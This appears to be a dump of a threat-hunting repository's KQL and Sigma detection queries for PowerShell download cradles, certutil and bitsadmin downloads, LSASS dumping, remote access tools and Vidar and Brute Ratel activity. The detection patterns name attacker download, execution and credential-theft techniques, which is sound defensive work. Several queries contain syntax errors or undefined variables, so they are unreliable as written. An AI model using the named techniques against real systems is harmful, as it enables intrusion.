Suspicious PowerShell commands 7 | Adversaries leverage PowerShell for ingress tool transfer more than any other tool. 
As such, monitoring for PowerShell process execution in conjunction with suspicious PowerShell commands in the command line can be a fruitful way to detect malicious ingress tool transfers. 8 | 9 | process == powershell.exe && command_includes ('downloadstring' || 'downloadata' || 'downloadfile' || 'iex' || '.invoke' || 'invoke-expression') 10 | 11 | `DeviceProcessEvents 12 | | where FileName =~ "powershell.exe" and ProcessCommandLine has_any ('downloadstring','downloadata','downloadfile','iex','.invoke','invoke-expression')` 13 | 14 | 15 | ## CertUtil downloading malicious binaries 16 | Adversaries often bypass security controls by using the Windows Certificate Utility (certutil.exe) to download malicious code. In general, they leverage certutil.exe along with the -split command-line option. 17 | 18 | process == certutil.exe && command_includes ('urlcache' && 'split') 19 | 20 | `DeviceProcessEvents 21 | | where FileName =~ "certutil.exe" and ProcessCommandLine has_any ('urlcache','split')` 22 | 23 | ## BITSAdmin downloading malicious binaries 24 | It’s not unusual for adversaries, including ones who peddle ransomware, to use BITSAdmin to download arbitrary files from the internet in an effort to evade application blocklisting. 
The following analytic will look for the execution of bitsadmin.exe with command options that suggest a file is being downloaded: 25 | 26 | process== bitsadmin.exe && command_includes ('download' || 'transfer') 27 | 28 | `DeviceProcessEvents 29 | | where FileName =~ "bitsadmin.exe" and ProcessCommandLine has_any ('download','transfer')` 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | -------------------------------------------------------------------------------- /RedCanary2023_PowerShell.md: -------------------------------------------------------------------------------- 1 | Source: 2 | 3 | 4 | 5 | ## Child process or rundll32 with a webrequest in the commandline 6 | 7 | `//process creation is the right table for a command-line check; the previous version queried DeviceImageLoadEvents on the grandparent 8 | DeviceProcessEvents 9 | | where (InitiatingProcessFileName =~ "rundll32.exe" or FileName =~ "rundll32.exe") and ProcessCommandLine has_any ("iwr","invoke-webrequest")` 10 | 11 | ## Weeding out partial matches of iex or iwr using regex 12 | 13 | `//KQL regex is case-sensitive unless (?i) is set, so Invoke-Expression / IEX were missed; \b also catches iex at the very start or end of the command line, which [^\w] does not 14 | DeviceProcessEvents 15 | | where ProcessCommandLine matches regex @"(?i)\biex\b|invoke-expression"` 16 | 17 | `DeviceProcessEvents 18 | | where ProcessCommandLine matches regex @"(?i)\biwr\b|invoke-webrequest"` 19 | 20 | ## system.management.automation.dll 21 | 22 | //the native image is System.Management.Automation.ni.dll, which a contains check for "system.management.automation.dll" misses; startswith is case-insensitive in KQL 23 | let excludedParentProcesses = datatable (process:string)["SenseIR.exe","SenseCM.exe"]; 24 | DeviceImageLoadEvents 25 | | where FileName startswith "system.management.automation" and InitiatingProcessParentFileName !in~ (excludedParentProcesses) 26 | | project InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessCommandLine 27 | 28 | -------------------------------------------------------------------------------- /Regsvr32ExternalScriptLoad.md: -------------------------------------------------------------------------------- 1 | # Regsvr32.exe loading scripts or files from external sources 2 | 3 | ## Source: Microsoft 4 | 5 | // Finds regsvr32.exe command line executions that loads scriptlet files from remote sites. 
6 | // This technique could be used to avoid application whitelisting and antimalware protection. 7 | DeviceNetworkEvents 8 | | where Timestamp > ago(7d) 9 | | where InitiatingProcessFileName =~ "regsvr32.exe" and InitiatingProcessCommandLine contains "/i:http" 10 | | project Timestamp, DeviceName, RemoteUrl, RemoteIP, InitiatingProcessCommandLine, InitiatingProcessParentFileName 11 | | top 100 by Timestamp 12 | -------------------------------------------------------------------------------- /Remote_Access_Tools.md: -------------------------------------------------------------------------------- 1 | # Remote Access Tools 2 | 3 | ### Experimental at present as I wrote these on my phone on a train 😁 4 | 5 | Catch all detection analytic - datatable needs expanding !!! 6 | 7 | let RATs = datatable (name:string)["action1","anydesk","gotoassist","logmein","teamviewer","vnc"]; 8 | let RATNames = DeviceFileEvents 9 | | where InitiatingProcessVersionInfoOriginalFileName has_any (RATs) or FileName contains has_any (RATs) | distinct FileName; 10 | DeviceNetworkEvents | where InitiatingProcessFileName in~ (RATNames) and ActionType contains "connection" 11 | 12 | let RATs = datatable (name:string)["action1","anydesk","gotoassist","logmein","teamviewer","vnc"]; 13 | let RATNames = DeviceFileEvents 14 | | where InitiatingProcessVersionInfoOriginalFileName has_any (RATs) or FileName contains has_any (RATs) | distinct FileName; 15 | DeviceProcessEvents | where InitiatingProcessFileName in~ (RATNames) or FileName in~ (RATFileNames) or InitiatingProcessParentFileName in~ (RATFileNames) 16 | 17 | # Action1 RAT 18 | 19 | **Source:** https://twitter.com/Kostastsale/status/1646256901506605063?t=FL3DWbCPHQQfAZoLTQMt1w&s=19 20 | 21 | ### Experimental at present as I wrote these on my phone on a train 😁 22 | 23 | let action1FileNames = DeviceFileEvents 24 | | where InitiatingProcessVersionInfoOriginalFileName contains "action1" or FileName contains "action1" | distinct FileName; 25 | 
DeviceProcessEvents 26 | | where InitiatingProcessFileName in~ (action1FileNames) or FileName in~ (action1FileNames) or InitiatingProcessParentFileName in~ (action1FileNames) 27 | 28 | let action1FileNames = DeviceFileEvents 29 | | where InitiatingProcessVersionInfoOriginalFileName contains "action1" or FileName contains "action1" | distinct FileName; 30 | DeviceProcessEvents 31 | | where InitiatingProcessFileName in~ (action1FileNames) and FileName in~ ("PowerShell.exe","cmd.exe") 32 | 33 | let action1FileNames = DeviceFileEvents 34 | | where InitiatingProcessVersionInfoOriginalFileName contains "action1" or FileName contains "action1" | distinct FileName; 35 | DeviceNetworkEvents 36 | | where InitiatingProcessFileName in~ (action1FileNames) and ActionType in~ ("ConnectionSuccess 37 | 38 | -------------------------------------------------------------------------------- /Rundll32_executing_DLL_from_Temp.md: -------------------------------------------------------------------------------- 1 | # Source: https://redcanary.com/blog/intelligence-insights-january-2023/ 2 | 3 | # Rundll32 executing DLL files located in the Windows Temp directory 4 | The following pseudo-detection analytic identifies instances of the Windows Rundll32 process loading code from DLL files located in the Windows Temp directory. It’s possible that some enterprise software in your environment will execute DLLs from windows\temp, so additional investigation may be needed to determine if the behavior is malicious. 5 | 6 | `//Rundll32 executing DLL files located in the Windows Temp directory 7 | //The following detection analytic identifies instances of the Windows Rundll32 process loading code from DLL files located in the Windows Temp directory. It’s possible that some enterprise software in your environment will execute DLLs from windows\temp, so additional investigation may be needed to determine if the behavior is malicious. 
8 | let trustedDlls = datatable(dll:string)["trustedDll.dll"]; //place trusted DLLs that launch from temp folders here. 9 | DeviceProcessEvents 10 | | where (InitiatingProcessFileName =~ "rundll32.exe" and ProcessCommandLine contains @"windows\temp") and not(ProcessCommandLine has_any (trustedDlls))` 11 | 12 | or 13 | 14 | `//Rundll32 executing DLL files located in the Windows Temp directory 15 | //The following detection analytic identifies instances of the Windows Rundll32 process loading code from DLL files located in the Windows Temp directory. It’s possible that some enterprise software in your environment will execute DLLs from windows\temp, so additional investigation may be needed to determine if the behavior is malicious. 16 | let trustedDlls = datatable(dll:string)["trustedDll.dll"]; //place trusted DLLs that launch from temp folders here. 17 | DeviceProcessEvents 18 | | where ((InitiatingProcessFileName =~ "rundll32.exe" and ProcessCommandLine contains @"windows\temp") or (InitiatingProcessParentFileName =~ "rundll32.exe" and InitiatingProcessCommandLine contains @"windows\temp")) and not(InitiatingProcessCommandLine has_any (trustedDlls) or ProcessCommandLine has_any (trustedDlls))` 19 | -------------------------------------------------------------------------------- /Scheduled_Task_Kusto_Queries.md: -------------------------------------------------------------------------------- 1 | ## Windows 10 2 | 3 | `//scheduled tasks 4 | DeviceProcessEvents 5 | | where ProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") or InitiatingProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") 6 | | summarize count() by InitiatingProcessCommandLine, ProcessCommandLine` 7 | 8 | `//scheduled tasks 9 | DeviceProcessEvents 10 | | where ProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") or InitiatingProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") 11 | | where 
ProcessCommandLine !endswith "AppData\\Local\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe" and ProcessCommandLine !~ '"MicrosoftEdgeUpdate.exe" /ua /installsource scheduler' and ProcessCommandLine !endswith "gpupdate.exe /target:computer" and ProcessCommandLine !endswith "gpupdate.exe /target:user" 12 | | summarize count() by InitiatingProcessCommandLine, ProcessCommandLine 13 | | where count_ <= 100` 14 | 15 | `//scheduled tasks 16 | DeviceProcessEvents 17 | | where (ProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") and InitiatingProcessCommandLine contains "%TEMP%") or (InitiatingProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") and ProcessCommandLine contains "%TEMP%")) 18 | | summarize count() by InitiatingProcessCommandLine, ProcessCommandLine` 19 | 20 | ## Windows 7 21 | 22 | `//scheduled tasks 23 | DeviceProcessEvents 24 | | where ProcessCommandLine has_all ("taskeng.exe","{") or InitiatingProcessCommandLine has_all ("taskeng.exe","{") 25 | | summarize count() by InitiatingProcessCommandLine, ProcessCommandLine` 26 | 27 | ## Windows XP 28 | 29 | Wmic process where processid-1234 get parentprocessid 30 | 31 | `//scheduled tasks 32 | DeviceProcessEvents 33 | | where ProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") or InitiatingProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") 34 | | summarize count() by FileName` 35 | 36 | `//scheduled tasks 37 | DeviceProcessEvents 38 | | where ProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") or InitiatingProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") 39 | | summarize count() by FolderPath` 40 | 41 | ## Scheduled tasks associated with certain filetypes associated with badness 42 | `//scheduled tasks associated with certain filetypes associated with badness 43 | DeviceProcessEvents 44 | | where ProcessCommandLine has_all 
("svchost.exe","-k","netsvcs","-p","-s","Schedule") or InitiatingProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") 45 | | where FileName contains "powershell" or FileName contains "cmd" or FileName contains "rundll32" or FileName contains "regsvr32" or FileName contains "wmic" 46 | | summarize count() by ProcessCommandLine` 47 | 48 | `DeviceProcessEvents 49 | | where FileName contains "powershell" or FileName contains "cmd" or FileName contains "rundll32" or FileName contains "regsvr32" or FileName contains "wmic" 50 | | summarize count() by ProcessCommandLine` 51 | 52 | `DeviceProcessEvents 53 | | where FileName contains ".ps1" or FileName contains ".bat" or FileName contains ".vbs" or FileName contains ".cmd" or FileName contains ".hta" or FileName contains ".js" 54 | | summarize count() by ProcessCommandLine` 55 | 56 | `//scheduled tasks created by wscript or cscript and is not a common script extension (scrip interpreter but using a script file) 57 | DeviceProcessEvents 58 | | where ProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") or InitiatingProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") 59 | | where FileName has_any ("wscript.exe","cscript.exe") and not (ProcessCommandLine has_any (".vbs",".js")) 60 | | summarize count() by ProcessCommandLine` 61 | 62 | ToDo: Identify common files in system32 that are being run from non system32 locations 63 | 64 | ## Remote scheduled tasks 65 | 66 | `DeviceImageLoadEvents 67 | | where FileName =~ "mswsock.dll" and InitiatingProcessFileName has_any ("schtasks.exe","mmc.exe","at.exe") 68 | //| project FileName, InitiatingProcessFileName, InitiatingProcessParentFileName` 69 | -------------------------------------------------------------------------------- /ShareFinder_Kusto_Query.md: -------------------------------------------------------------------------------- 1 | # Source: Detailed Report 
https://thedfirreport.com/2023/01/23/sharefinder-how-threat-actors-discover-file-shares/ 2 | 3 | # SIGMAs: 4 | - https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/rules/windows/builtin/win_security_invoke_sharefinder_discovery.yml 5 | - https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/rules/windows/powershell/powershell_script/posh_ps_invoke_sharefinder_discovery.yml 6 | - https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/rules/network/zeek/zeek_smb_mapping_invoke-sharefinder_discovery.yml 7 | 8 | # Encoded data. Adversaries may encode data to make the content of command and control traffic more difficult to detect. 9 | `//T1132 - T1132.001 - Base64 Encoded data. Adversaries may encode data to make the content of command and control traffic more difficult to detect. 10 | DeviceProcessEvents 11 | | where FileName =~ "powershell.exe" 12 | //filter out FPs caused by the MDE SenseIR binary 13 | | where InitiatingProcessParentFileName != "SenseIR.exe" 14 | //filter out FPs caused by Nutanix 15 | | where InitiatingProcessFolderPath !contains "c:\\program files\\nutanix" 16 | //filter out noise caused by Windows Defender Exploit Guard 17 | | where InitiatingProcessCommandLine !startswith "gc_worker.exe -a WindowsDefenderExploitGuard" 18 | //filter out noise caused by ansible service account 19 | | where InitiatingProcessAccountName != "svc-ansiblew" 20 | | extend SplitLaunchString = split(ProcessCommandLine, " ") 21 | | mvexpand SplitLaunchString 22 | | where SplitLaunchString matches regex "^[A-Za-z0-9+/]{50,}[=]{0,2}$" 23 | | extend Base64 = tostring(SplitLaunchString) 24 | | extend DecodedString = base64_decodestring(Base64) 25 | | where isnotempty(DecodedString) 26 | | extend test = replace(@'\00', @'', DecodedString) 27 | | extend DShash = hash_md5(DecodedString) 28 | | where DShash != "765213794bd23a89ce9a84459a0cef80" 29 | | where InitiatingProcessCommandLine contains "Invoke-ShareFinder" or DecodedString contains "Invoke-ShareFinder"` 30 | 
-------------------------------------------------------------------------------- /T1003.001_LASS_dumping_werfault_exe.md: -------------------------------------------------------------------------------- 1 | # Memory dumping with Werfault.exe 2 | ## Credential Access 3 | ## T1003.001 4 | 5 | ### MDE 6 | 7 | `DeviceFileEvents 8 | | where InitiatingProcessParentFileName has "werfault.exe" or InitiatingProcessFileName has "werfault.exe" 9 | | where FolderPath contains "lsass" 10 | | project Timestamp, DeviceName, ActionType, FolderPath, FileName, PreviousFolderPath, PreviousFileName, FileSize, SHA256, InitiatingProcessFolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessId, InitiatingProcessSHA256, InitiatingProcessParentFileName, InitiatingProcessParentId, InitiatingProcessAccountDomain, InitiatingProcessAccountName, InitiatingProcessVersionInfoCompanyName, InitiatingProcessVersionInfoProductName, InitiatingProcessVersionInfoProductVersion, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessVersionInfoOriginalFileName, InitiatingProcessVersionInfoFileDescription, DeviceId, ReportId 11 | | order by Timestamp` 12 | 13 | ### Sentinel 14 | 15 | `SecurityEvent 16 | | where NewProcessName endswith "werfault.exe" 17 | | where ObjectName endswith "lsass.exe" 18 | | project NewProcessName, ObjectName` 19 | -------------------------------------------------------------------------------- /T1087.001_AccountDiscovery-LocalAccount.md: -------------------------------------------------------------------------------- 1 | # T1087.001: Account Discovery - Local Account 2 | 3 | # Sources: 4 | 5 | 6 | ## Execution of mmc.exe, the Microsoft Management Console, spawning the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information. 
7 | 8 | 9 | ``` 10 | DeviceProcessEvents 11 | | where initiatingProcessFileName =~"mmc.exe" and FileName =~ "lusrmgr.msc" 12 | //Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information. 13 | ``` 14 | -------------------------------------------------------------------------------- /Telegram_Shortened_Domains.md: -------------------------------------------------------------------------------- 1 | # Queries from the blog: https://redcanary.com/blog/intelligence-insights-november-2022/ 2 | 3 | # Processes making outbound network connections to Telegram shortened domains t[.]me or tttttt[.]me 4 | `//Detection opportunity: Unexpected processes making outbound network connections to Telegram shortened domains t[.]me or tttttt[.]me 5 | //The following detection analytic identifies unexpected processes making outbound network connections to the Telegram shortened domains t[.]me or tttttt[.]me. Telegram has been used for command and control (C2) by various stealers including RedLine, Vidar, and Raccoon. Since legitimate applications like Windows browsers, Zscaler, and others have been observed using t[.]me, additional investigation of the executing binary’s reputation is key. 
6 | //source: https://redcanary.com/blog/intelligence-insights-november-2022/ 7 | let exclusions = datatable(filename:string)["broswer1.exe","browser2.exe","telegram.exe"]; 8 | DeviceNetworkEvents 9 | | where not(InitiatingProcessFileName has_any (exclusions)) and (RemoteUrl endswith "t.me" or RemoteUrl endswith "tttttt.me")` 10 | -------------------------------------------------------------------------------- /USB_Device_Hunting.md: -------------------------------------------------------------------------------- 1 | # USB Related Hunting Queries 2 | 3 | # Sources: 4 | - https://blog.amestofortytwo.com/hunting-malicious-usb/ 5 | - 6 | - 7 | 8 | Kusto Queries (KQL): 9 | 10 | `//source: https://blog.amestofortytwo.com/hunting-malicious-usb/ 11 | // A great tool to add to this query: https://devicehunt.com/view/type/usb/ 12 | let known_suspicious = dynamic(["VID_03eb", "PID_2401" // Atmel 13 | , "VID_16D0", "PID_0753" // Digispark 14 | , "VID_16C0", "PID_0483" // Teensyduino 15 | , "VID_2341" // Arduino https://devicehunt.com/view/type/usb/vendor/2341 16 | ]); 17 | DeviceEvents 18 | | mv-expand AdditionalFields 19 | | where AdditionalFields["VendorIds"] has_any (known_suspicious) 20 | | join kind=inner ( 21 | DeviceProcessEvents 22 | | where ProcessCommandLine != "" 23 | | extend CommandRun = TimeGenerated 24 | ) on DeviceId, DeviceName 25 | | where CommandRun between (TimeGenerated .. 
10s) // Time from plugin to action 26 | | where InitiatingProcessParentFileName1 has_any ("userinit.exe", "explorer.exe") // User initiated - non system actions 27 | | project Plugin=TimeGenerated, CommandRun, AdditionalFields, DeviceName, PossibleFileExec=FileName1, InitPCMD = InitiatingProcessCommandLine1, InitPPFN = InitiatingProcessParentFileName1, InitPPID=InitiatingProcessParentId1, PID=ProcessId1` 28 | -------------------------------------------------------------------------------- /VBScript_stored_in_non-run_reg_key.md: -------------------------------------------------------------------------------- 1 | # VBScript stored in non-run CurrentVersion registry key 2 | # Source: Cyborg www.cyborgsecurity.io 3 | ## Logic tweaked and improved by GK from original 4 | 5 | `DeviceRegistryEvents 6 | | where RegistryKey has "\\CurrentVersion" 7 | | where RegistryKey !has "\\Run" 8 | | where RegistryValueData has_any ("RunHTMLApplication","vbscript","jscript","mshtml","mshtml","mshtml ","Execute","CreateObject","RegRead","window.close") 9 | | project Timestamp, DeviceName, InitiatingProcessAccountName, ActionType, RegistryKey, RegistryValueName, RegistryValueData, PreviousRegistryValueName, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessId, InitiatingProcessParentId, DeviceId, ReportId 10 | | order by Timestamp` 11 | 12 | `SecurityEvent 13 | | where ObjectName has "\\CurrentVersion" 14 | | where ObjectName !has "\\Run" 15 | | where NewValue has_any ("RunHTMLApplication","vbscript","jscript","mshtml","mshtml","mshtml ","Execute","CreateObject","RegRead","window.close") 16 | | project TimeGenerated, Computer, Process, ObjectName, ObjectValueName, NewValue, OldValue, SubjectUserName, NewProcessId, SourceComputerId 17 | | order by TimeGenerated` 18 | -------------------------------------------------------------------------------- /Vidar_Kusto_Query.md: -------------------------------------------------------------------------------- 1 | # Vidar 
Kusto Queries 2 | 3 | `// Vidar deployed via fake zoom sites and application. Identify email or phishing containing URLs with known bad domains 4 | //https://blog.cyble.com/2022/09/19/new-malware-campaign-targets-zoom-users/ 5 | let domains = datatable (domain:string )['zoom-download.host','zoom-download.space','zoom-download.fun','zoomus.host','zoomus.tech','zoomus.website']; 6 | let dowloadUrls = datatable (url:string)[ "https://github[.]com/sgrfbnfhgrhthr/csdvmghfmgfd/raw/main/Zoom.zip"]; 7 | let files = datatable (file:string)["zoom.zip"]; 8 | EmailEvents 9 | | join EmailUrlInfo on NetworkMessageId 10 | | where UrlDomain in~ (domains)` 11 | 12 | `// Vidar deployed via fake zoom sites and application 13 | // detect network events where known bad domains and file names downloaded. 14 | //https://blog.cyble.com/2022/09/19/new-malware-campaign-targets-zoom-users/ 15 | let domains = datatable (domain:string )['zoom-download.host','zoom-download.space','zoom-download.fun','zoomus.host','zoomus.tech','zoomus.website']; 16 | let dowloadUrls = datatable (url:string)[ "https://github[.]com/sgrfbnfhgrhthr/csdvmghfmgfd/raw/main/Zoom.zip"]; 17 | let files = datatable (file:string)["zoom.zip"]; 18 | DeviceNetworkEvents 19 | | where RemoteUrl has_any (domains) and RemoteUrl has_any (files)` 20 | 21 | `// Vidar deployed via fake zoom sites and application 22 | // detect known bad process parent, child relationships 23 | //https://blog.cyble.com/2022/09/19/new-malware-campaign-targets-zoom-users/ 24 | DeviceProcessEvents 25 | | where (InitiatingProcessParentFileName contains "zoom.exe" or InitiatingProcessFileName contains "zoom.exe") and (InitiatingProcessFileName has_any ("msbuild.exe","decoder.exe") or FileName has_any ("msbuild.exe","decoder.exe","shell.exe")) 26 | | summarize count() by InitiatingProcessParentFileName, InitiatingProcessFileName, FileName` 27 | 28 | `//locate users that had interacted with the subdomain in the Vidar stealer log dump 29 | DeviceNetworkEvents 
30 | | where RemoteUrl contains "stage.gk.heathrow.com" 31 | | summarize count() by InitiatingProcessAccountName, InitiatingProcessAccountUpn` 32 | 33 | `//detects commandline associated with Vidar Cleanup 34 | //Upon successful execution, the malware uses the following commands to uninstall itself from the victim’s device. 35 | //https://blog.cyble.com/2022/09/19/new-malware-campaign-targets-zoom-users/ 36 | DeviceProcessEvents 37 | | where ProcessCommandLine has_all ('C:\\Windows\\System32\\cmd.exe',' /c ','taskkill',' /im ','MSBuild.exe',' /f ',' & ',' timeout ',' /t ',' 6 ',' & ',' del ',' /f ',' /q ')` 38 | 39 | `//detects commandline associated with Vidar Cleanup 40 | //Upon successful execution, the malware uses the following commands to uninstall itself from the victim’s device.//https://blog.cyble.com/2022/09/19/new-malware-campaign-targets-zoom-users/ 41 | DeviceProcessEvents 42 | | where ProcessCommandLine has_all ('C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe','&','del','C:\\PrograData\\','.dll','&','exit')![image](https://user-images.githubusercontent.com/16122365/222918509-c06869d0-16e8-4053-9e71-1df7cd8e3381.png)` 43 | -------------------------------------------------------------------------------- /_template.md: -------------------------------------------------------------------------------- 1 | # *Detection Title* 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | | --- | --- | --- | 9 | | T1134.002 | Access Token Manipulation: Create Process with Token |Access Token Manipulation: Create Process with Token| 10 | 11 | #### Description 12 | Description of the detection rule. 13 | 14 | Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. 
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. 15 | 16 | #### Risk 17 | Explain what risk this detection tries to cover 18 | 19 | #### Author 20 | - **Name:** 21 | - **Github:** 22 | - **Twitter:** 23 | - **LinkedIn:** 24 | - **Website:** 25 | 26 | #### References 27 | - https://kqlquery.com/ 28 | - https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules 29 | - example link 3 30 | 31 | ## Defender For Endpoint 32 | ```KQL 33 | // Paste your query here 34 | DeviceProcessEvents 35 | | where FileName == "Example.File" 36 | ``` 37 | ## Sentinel 38 | ```KQL 39 | // Paste your query here 40 | DeviceProcessEvents 41 | | where FileName == "Example.File" 42 | ``` 43 | -------------------------------------------------------------------------------- /admin_share_kusto_query.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | DeviceProcessEvents 4 | | where (IniatingProcessParentFileName =~ "wmiprvse.exe" or IniatingProcessFileName =~ "wmiprvse.exe") and (IniatingProcessFileName =~ "cmd.exe" or FileName =~ "cmd.exe") and (InitiatingProcessCommandLine contains @"\\127.0.0.1\ADMIN" or ProcessCommandLine contains @"\\127.0.0.1\ADMIN") 5 | -------------------------------------------------------------------------------- /attackReport.md: -------------------------------------------------------------------------------- 1 | # MITRE ATT&CK Reporting 2 | 3 | let enterpriseAttack = externaldata (type:string, id:string, objects:dynamic)[h@"https://raw.githubusercontent.com/mitre/cti/master/enterprise-attack/enterprise-attack.json"] 4 | with (format="multijson"); 5 | enterpriseAttack 6 | | mv-expand objects 7 | | extend objectType = tostring(objects.type) 8 | | extend objectId = tostring(objects.id) 9 | | where objectType =~ "attack-pattern" //and attackTechnique matches regex 
@"T[0-9]{4}(|\.[0-9]{3})" 10 | | extend attackTechnique = parse_json(tostring(objects.external_references))[0].external_id 11 | | extend attackTechniqueName = tostring(objects.name) 12 | | extend attackUrl = parse_json(tostring(objects.external_references))[0].url 13 | | extend killchainPhases = parse_json(objects.kill_chain_phases) 14 | | extend dataSources = parse_json(objects.x_mitre_data_sources) 15 | | extend detectionAdvice = parse_json(objects.x_mitre_detection) 16 | | project attackTechnique, attackTechniqueName, attackUrl, killchainPhases, dataSources, detectionAdvice, objectId, objectType, type, objects 17 | -------------------------------------------------------------------------------- /autostart_persistence_kusto_query.md: -------------------------------------------------------------------------------- 1 | # Autostart Persistence 2 | 3 | # Master Source: https://www.hexacorn.com/blog/2017/01/28/beyond-good-ol-run-key-all-parts/ 4 | 5 | ## HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\Extension\PeerdistDllName=peerdist.dll 6 | The wininet.dll library is using this location internally in its P2P_PEER_DIST_API::LoadPeerDist function. 7 | 8 | ## Source: https://www.hexacorn.com/blog/2022/01/23/beyond-good-ol-run-key-part-138/ 9 |
10 | Kusto inspiration from [@Bert-JanP](https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules/edit/main/DFIR/DFE%20-%20Registry-Run-Keys-Forensics.md) 11 | 12 | ### Defender For Endpoint 13 | 14 | ``` 15 | let CompromisedDevices = dynamic (["laptop1", "server1"]); 16 | let SearchWindow = 7d; //Customizable h = hours, d = days 17 | DeviceRegistryEvents 18 | | where Timestamp > ago(SearchWindow) 19 | | where DeviceName has_any (CompromisedDevices) 20 | | where PreviousRegistryKey startswith "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\Extension\PeerdistDllName=peerdist.dll" 21 | | extend RegistryChangeInfo = pack_dictionary("RegistryKey", RegistryKey, "Action Performed", ActionType, "Old Value", PreviousRegistryKey, "New Value", RegistryValueData) 22 | | summarize TotalKeysChanged = count(), RegistryInfo = make_set(RegistryChangeInfo) by DeviceName 23 | ``` 24 | ### Sentinel 25 | 26 | ``` 27 | let CompromisedDevices = dynamic (["laptop1", "server1"]); 28 | let SearchWindow = 7d; //Customizable h = hours, d = days 29 | DeviceRegistryEvents 30 | | where TimeGenerated > ago(SearchWindow) 31 | | where DeviceName has_any (CompromisedDevices) 32 | | where PreviousRegistryKey startswith "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\Extension\PeerdistDllName=peerdist.dll" 33 | | extend RegistryChangeInfo = pack_dictionary("RegistryKey", RegistryKey, "Action Performed", ActionType, "Old Value", PreviousRegistryKey, "New Value", RegistryValueData) 34 | | summarize TotalKeysChanged = count(), RegistryInfo = make_set(RegistryChangeInfo) by DeviceName 35 | ``` 36 | 37 | 38 | 39 | Persistence registry keys: 40 | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\AutoplayHandlers\Handlers 41 | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\StillImage\Registered Applications 42 | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StillImage\Events\STIProxyEvent 43 | 
-------------------------------------------------------------------------------- /aws_ec2_kusto_queries.md: -------------------------------------------------------------------------------- 1 | # AWS Hunt Queries 2 | 3 | ## EC2 Security Group Backdoor 4 | 5 | **SIGMA** 6 | 7 | `title: 'Detects Backdooring EC2 Security Groups' 8 | description: 'Detects the insertion of backdoor access into EC2' 9 | author: 'Gavin Knapp' 10 | status: experimental 11 | logsource: 12 | service: cloudtrail 13 | detection: 14 | event_source: 15 | - eventName: AuthorizeSecurityGroupIngress 16 | - eventSource: ec2.amazonaws.com 17 | Filter_Trusted_Ips: 18 | sourceIPAddress: 19 | - 1.1.1.2 20 | - 8.8.8.8 21 | condition: "all of event_source and not Filter_Trusted_Ips" 22 | fields: 23 | - 'sourceIPAddress' 24 | - 'requestParameters.cidrIp' 25 | - 'userIdentity.arn' 26 | falsepositives: 27 | - 'Valid changes to security groups' 28 | level: 'high'` 29 | 30 | # Sentinel 31 | 32 | `AWSCloudTrail 33 | | where ((eventName =~ @'AuthorizeSecurityGroupIngress' and eventSource =~ @'ec2.amazonaws.com') and not (sourceIPAddress in~ (@'107.14.3.11', @'107.14.3.10', @'107.14.3.12')))` 34 | -------------------------------------------------------------------------------- /brute_ratel_C4.md: -------------------------------------------------------------------------------- 1 | # Brute Ratel Sentinel Queries 2 | 3 | ## Kusto Queries 4 | 5 | `// Possible Brute Ratel C4 Red Team Tool Detect (via DeviceFileEvents) 6 | DeviceFileEvents 7 | | where ActionType =~ "FileCreated" 8 | | where FileName has_any ('fotos.iso','version.dll','brute-dll-agent.bin','versions.dll') or PreviousFileName has_any ('fotos.iso','version.dll','brute-dll-agent.bin','versions.dll') ` 9 | 10 | `// Possible Brute Ratel C4 Red Team Tool Detect (via file_event) 11 | SecurityEvent | where EventID == 11 | where (TargetFileName contains 'fotos.iso' or TargetFileName contains 'version.dll' or TargetFileName contains 'brute-dll-agent.bin' or 
